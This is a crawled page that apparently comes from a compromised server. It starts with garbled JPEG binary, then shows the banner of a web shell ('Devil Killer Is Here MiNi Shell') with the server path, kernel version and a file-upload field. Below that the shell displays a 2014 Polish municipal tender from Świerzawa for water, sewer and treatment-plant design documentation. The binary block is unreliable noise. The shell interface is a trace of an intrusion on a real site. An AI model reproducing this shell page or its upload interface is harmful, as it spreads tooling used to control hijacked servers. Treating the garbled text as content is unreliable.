JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140415/128014-N-2014.html

<p class="kh_header"><b>Świerzawa: Opracowanie dokumentacji technicznej budowy sieci wod-kan, oczyszczalni ścieków i hydroforni w Sokołowcu i Rząśniku gmina Świerzawa</b><br>
<b>Numer ogłoszenia: 128014 - 2014; data zamieszczenia: 15.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy , pl. Wolności 60, 59-540 Świerzawa, woj. dolnośląskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.Świerzawa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji technicznej budowy sieci wod-kan, oczyszczalni ścieków i hydroforni w Sokołowcu i Rząśniku gmina Świerzawa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest opracowanie dokumentacji technicznej budowy wodociągu i kanalizacji w Sokołowcu oraz Rząśniku gmina Świerzawa oraz oczyszczalni ścieków i ujęcia wody z hydrofornią. 
2.Zakres przedmiotu zamówienia: 
Realizacja przedmiotu zamówienia polega na wykonaniu  opracowań i usług : 
1).Materiały do decyzji środowiskowych uwarunkowaniach 
a) raport o oddziaływaniu przedsięwzięcia na środowisko wymagany do wniosku o wydanie decyzji o środowiskowych uwarunkowaniach ,
b) uzupełnianie dokumentacji i materiałów niezbędnych do otrzymania decyzji o środowiskowych uwarunkowaniach i decyzji o zezwoleniu na realizację inwestycji na etapie pozyskiwania ww. decyzji. 
2) Opracowanie dokumentacji technicznej budowy wodociągi i kanalizacji sanitarnej w miejscowości Sokołowiec i Rząśnik gmina Świerzawa  wraz z pozwoleniem na budowę.  
3) W/w dokumentacje techniczne należy wykonać zgodnie z  Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy  dokumentacji projektowej, specyfikacji  technicznych wykonania i odbioru robót  budowlanych oraz programu funkcjonalno-użytkowego ( Dz. U. Nr 202, poz. 2072 z późniejszymi zmianami ) .
a)projekty budowlane -  z elementami projektu wykonawczego ( szczegóły wykonawcze przepompowni i tłoczni z częścią elektryczną, profile ) , które należy wykonać zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 25 kwietnia 2012r. w sprawie szczególnego zakresu i formy projektu budowlanego (Dz. U. Nr z 2012r. poz. 462 ze zm. )zawierający informacje  dotyczące  bezpieczeństwa  i ochrony  zdrowia  wg wymagań ustawy -Prawo budowlane  oraz rozwiązanie problemu przydatności i  wskazania zagospodarowania odpadów  zgodnie z obowiązującą  ustawą o odpadach  ( Dz. U. z  2007 r. Nr 39 poz.251 z późn. zm.) 
b) przedmiary robót,
c) kosztorysy inwestorskie - należy wykonać zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego ,obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robot budowlanych określonych w programie funkcjonalno-użytkowym ( Dz.U.Nr 130 poz.1389 )specyfikacje techniczne wykonania i odbioru robót należy wykonać zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji  technicznych wykonania i odbioru robót  budowlanych oraz programu funkcjonalno-użytkowego (  Dz.U. z 2013r, poz. 1129 z późniejszymi zmianami ) uzyskanie na rzecz zamawiającego decyzji prawomocne pozwolenia na budowę aktualizacja cenowa kosztorysu inwestorskiego wykonywana na żądanie Zamawiającego w okresie trzech  lat od dnia podpisania umowy w ilości nie przekraczającej 6 aktualizacji. W ramach aktualizacji kosztorysów inwestorskich Wykonawca  sporządzi jeden egzemplarz kosztorysu i przekaże go Zamawiającemu w formie papierowej oraz elektronicznej w formacie plików PDF i ATH.

4) Zamawiający informuje i wymaga :

A.W miejscowości Sokołowiec zameldowanych jest ok. 700 osób i jest 157 budynków posiadających nadany nr budynku, a w miejscowości Rząśnik ( wraz z Orzechowicami - ok. 50 mieszkańców i Posębskiem - ok. 20 mieszkańców) zameldowanych jest łącznie ok. 425 osób i jest 101 budynków posiadających nadany nr budynku. Budynki będące w trakcie budowy - posiadające ważne pozwolenie na budowę na dzień 30 maja 2015 - należy ująć w opracowaniu. 
B.Zamawiający zastrzega sobie prawo do kontroli prac projektowych na każdym etapie projektowania.
C.Wykonawca zobowiązany jest do konsultowania rozwiązań projektowych z Zamawiającym oraz do zorganizowania raz na dwa miesiące ( w razie potrzeby częściej ) w czasie narad technicznych w terminie z nim uzgodnionym.

W ramach opracowania wykonawca zrealizuje :
1.Pozyskanie map do celów opiniodawczych i ewidencyjnych dla miejscowości Sokołowiec i Rząśnik.
2.Wykonania na tych mapach koncepcji proponowanych przebiegów sieci ( wodociągowej i kanalizacyjnej) i lokalizacji innych obiektów ( pompowni, oczyszczalni, ujęcia wody, stacji uzdatniania i hydroforni ), przedstawi proponowane rozwiązania techniczne i materiałowe oraz szacowane koszty inwestycyjne i eksploatacyjne dla każdej z koncepcji. Po akceptacji Zamawiającego i mieszkańców na zebraniu wiejskim przystąpi do projektowania.
3.Przyłącza należy zaprojektować do budynku ( chyba, że z właścicielem posesji będzie to uzgodnione inaczej),
4.Aktualizację map do celów projektowych w zakresie opracowywanych sieci i obiektów.
5.Zlecenie badań geotechnicznych w zakresie wymaganym dla prawidłowego wykonania projektu i kosztorysu.
6.Uzyskanie warunków przyłączeniowych z Zakładu Energetycznego i na ich podstawie przy akceptacji Zamawiającego wykonanie projektów WLZ.
7.Wykonanie projektów budowlanych ( 4 egz.) dla wszystkich branż występujących w opracowaniu i uzyskanie pozwolenia na budowę. 
8.Opracowanie STWiOR oraz kosztorysów inwestorskich.
5).Wykonawca przekazując przedmiot zamówienia załączy wykaz opracowań oraz pisemne oświadczenie, że są wykonane zgodnie z umową i specyfikacją istotnych warunków zamówienia, obowiązującymi normami, przepisami i zasadami sztuki projektowej oraz, że są kompletne, spójne i stanowić mogą podstawę do realizacji robót budowlanych. 

Przekaże zamawiającemu następujące opracowania:
1.Mapy ewidencyjne i zasadnicze do celów opiniodawczych w wersji papierowej - 1 egz. oraz w wersji elektronicznej na CD ( TIFF i wektorowo cały zakres map - dxf )
2.Wersja papierowa:  
-Komplet uzgodnień - w formie i treści uzgodnionej z zamawiającym /wrysowany przebieg na załączniku graficznym i pisemna zgoda na realizację wg. załącznika  - ( oryginał) z właścicielami ternu objętego projektowana inwestycją, przed wystąpieniem o decyzję zatwierdzającą PB.
-Projekt budowlany (komplet - 2 egz. - załączniki do pozwolenia na budowę dla wszystkich wymaganych branż występujących w opracowaniu i uzyskane prawomocne pozwolenie na budowę). Z projektem odbudowy nawierzchni dróg asfaltowych.
-STWiOR - 1 egz. ,
-Kosztorysy inwestorskie - 1 egz.  
-Komplet ( oryginały) opinii i uzgodnień z organami i instytucjami.
-PZT z PB - przebieg zaprojektowanych sieci (mapy - 3 egz. rysunków (bez profili) i w 1 egz. komplet profili).
-Badania geotechniczne - 1 egz.
-Pozwolenia wodno-prawne i decyzje środowiskowe o ile będą wymagane.
-Warunki przyłączeniowe wydane przez ZE - 1 komplet.
-Projekty wykonawcze - 2 egz.
3.Wersja elektroniczna na płycie ( CD lub DVD):
-Projekt budowlany ( format PDF ( z możliwością włączania warstw) i DXF - DWG 2006 wg. uzgodnionego standardu - pliki źródłowe zgodne z załącznikiem do pozwolenia na budowę).
-STWiOR - w formacie PDF,
-Kosztorysy inwestorskie w formacie ATH i PDF( z podziałem na etapy realizacyjne),
-Kosztorysy tzw. ślepe z przedmiarem w formacie PDF i ATH,
-Badania geotechniczne ( PDF),
-Projekty wykonawcze (format PDF ( z możliwością włączania warstw) i DXF - DWG 2006 wg. uzgodnionego standardu)
-Zestawienie przyłączy i sieci wodociągowych i kanalizacyjnych z podziałem na etapy (plik - arkusz kalkulacyjny). Dla przyłączy wod- kan zestawienie zawierać musi: nr działki, adres w miejscowości, właściciela działki z adresem zamieszkania, długość przyłączy wod-kan. Nr studni włączeniowej  trójnika i średnice.
-Zestawienie uzgodnień z właścicielami, organami i instytucjami (plik - arkusz kalkulacyjny).
-Bilans mas ziemnych, zestawienie odtworzeń nawierzchni szutrowych i asfaltowych, zestawienie przecisków, zestawienie studni ( z zegarami ), armatury i materiałów, 
6) Informacje dodatkowe 	
Zamawiający udzieli Wykonawcy pełnomocnictwa do reprezentowania Zamawiającego przed wszystkimi instytucjami opiniującymi, uzgadniającymi oraz wydającymi decyzje w związku z realizacja umowy na opracowanie dokumentacji technicznej.
7)Wykonawca we własnym zakresie i na własny koszt w ramach zamówienia 
a)uzyska mapę do celów projektowych bądź jej aktualizację w zależności od istniejących zasobów (należy rozeznać w Starostwie Powiatowym Wydziale Geodezji w Złotoryi ).
b)zabezpieczy obsługę geodezyjną, geologiczną i geotechniczną 
c)wykona wszystkie pomiary, badania obliczenia i ekspertyzy potrzebne do prawidłowego opracowania dokumentacji technicznej i kosztorysowej,
d)uzyska wszystkie warunki, opinie, decyzje i uzgodnienia niezbędne do prawidłowego opracowania dokumentacji oraz wymagane do uzyskania decyzji administracyjnej będącej pozwoleniem na budowę 

Inwestycja przewidywana jest do objęcia dofinansowaniem ze środków unijnych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.10.00-4, 71.32.22.00-3, 71.32.00.00-7, 71.24.00.00-6, 71.24.50.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od wniesienia wadium .</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego wymagania w tym zakresie. 
Ocena warunku nastąpi na podstawie złożonego przez wykonawcę oświadczenia .</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający warunek uzna za spełniony gdy Wykonawca wykaże iż
1. Wykonawca w okresie ostatnich przed terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należycie wykonał co najmniej jedną usługę polegająca na wykonaniu projektu budowlanego i projektów wykonawczych budowy sieci wodociągowej i kanalizacyjnej o długości łącznej (np. dwa oddzielne projekty) nie mniejszej niż 12 km, jednego projektu oczyszczalni ścieków ( na min. 1000 RLM ), jednego projektu hydroforni ujęciem wody. 

W przypadku wspólnego ubiegania się o udzielenie zamówienia ,warunek zostanie uznany, jeżeli zamówienie wykonał w całości jeden z Wykonawców wspólnie ubiegający się o zamówienie .

Ocena spełnienia tego warunku udziału w postępowaniu będzie dokonana na podstawie dokumentów wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w zakresie dysponowania odpowiednim potencjałem technicznym.
Ocena warunku nastąpi na podstawie złożonego przez wykonawcę oświadczenia .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek dysponowania osobami zdolnymi do wykonania zamówienia kiedy wykaże, że dysponuje co najmniej jednym projektantem w następującej branży :
Projektant branży sanitarno -technologicznej powinien posiadać następujące kwalifikacje 
-uprawnienia budowlane do projektowania  w specjalności instalacyjnej  w zakresie sieci ,instalacji i urządzeń  cieplnych , wentylacyjnych , gazowych , wodociągowych i kanalizacyjnych. bez ograniczeń  lub odpowiadające im uprawnienia budowlane  które zostały wydane na podstawie wcześniej obowiązujących przepisów .
Projektant w zakresie robót instalacji, urządzeń elektrycznych i automatyki powinien posiadać następujące kwalifikacje i doświadczenia :
-uprawnienia budowlane do projektowania w specjalności instalacyjnych w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń  lub odpowiadające im uprawnienia budowlane  które zostały wydane na podstawie wcześniej obowiązujących przepisów . 
Projektant w zakresie robót budowlanych oraz drogowych  powinien posiadać następujące kwalifikacje i doświadczenia :
-uprawnienia budowlane do projektowania  w specjalności konstrukcyjno - budowlanej oraz w specjalności drogowej  bez ograniczeń lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów w specjalności konstrukcyjno-budowlanej i drogowej.

Jeżeli wskazana wyżej osoba jest obywatelem państw członkowskich Unii Europejskiej i nabyła w tych państwach, poza granicami Rzeczypospolitej Polskiej, kwalifikacje zawodowe do wykonywania samodzielnych funkcji w budownictwie, mając na względzie obowiązujące w Polsce przepisy prawa krajowego wymagane jest od tej osoby uznanie jej kwalifikacji zawodowych.
Ocena spełnienia tego warunku udziału w postępowaniu będzie dokonana na podstawie dokumentów wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego wymagania w tym zakresie. 
Ocena warunku nastąpi na podstawie złożonego przez wykonawcę oświadczenia .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zamawiający warunek uzna za spełniony gdy Wykonawca wykaże iż
1. Wykonawca w okresie ostatnich przed terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należycie wykonał co najmniej jedną usługę polegająca na wykonaniu projektu budowlanego i projektów wykonawczych budowy sieci wodociągowej i kanalizacyjnej o długości łącznej (np. dwa oddzielne projekty) nie mniejszej niż 12 km, jednego projektu oczyszczalni ścieków ( na min. 1000 RLM ), jednego projektu hydroforni ujęciem wody. Wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie	(;załącznik nr 4)
Dowodami są :
- poświadczenie, z tym że w odniesieniu do nadal wykonywanych dostaw lub usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo ofert
- w przypadku zamówień na dostawy lub usługi - oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia , o którym mowa w pkt.1 
Każda z realizacji uznanych przez Wykonawcę za najważniejszą oraz realizacji wykazanych na potwierdzenie spełnienia warunku udziału w postępowaniu powinna być poparta załączonymi:
(a) dokumentami potwierdzającymi wykonanie usług i ich prawidłowe ukończenie lub są realizowane, 
(b) dowodami określającymi czy te usługi zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami i ukończone.
Dowodami są poświadczenia lub inne dokumenty, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia.
Ww. dowody muszą być wydane przez podmiot na rzecz, którego te usługi zostały wykonane.
Za najważniejsze usługi które należy wykazać w wykazie  oraz dla których należy przedstawić  dowody ,uznaje się usługi niezbędne do wykazania spełnienia warunku o którym mowa w ust. IX .1.1.2 siwz
W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie zostały wykonane wcześniej, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w (a) i (b).;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>4. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionej poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
1) Zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, w szczególności; wstrzymanie robót przez zamawiającego.
2) W przypadku zmian osób uprawnionych do reprezentowania zamawiającego lub wykonawcy strony dokonają stosownych zmian w umowie.
3) W przypadku wystąpienia którejkolwiek z okoliczności wyżej wymienionych, gdy termin wykonania umowy ulegnie odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonywania jej przedmiotu, nie dłużej jednak niż o okres trwania tych okoliczności.
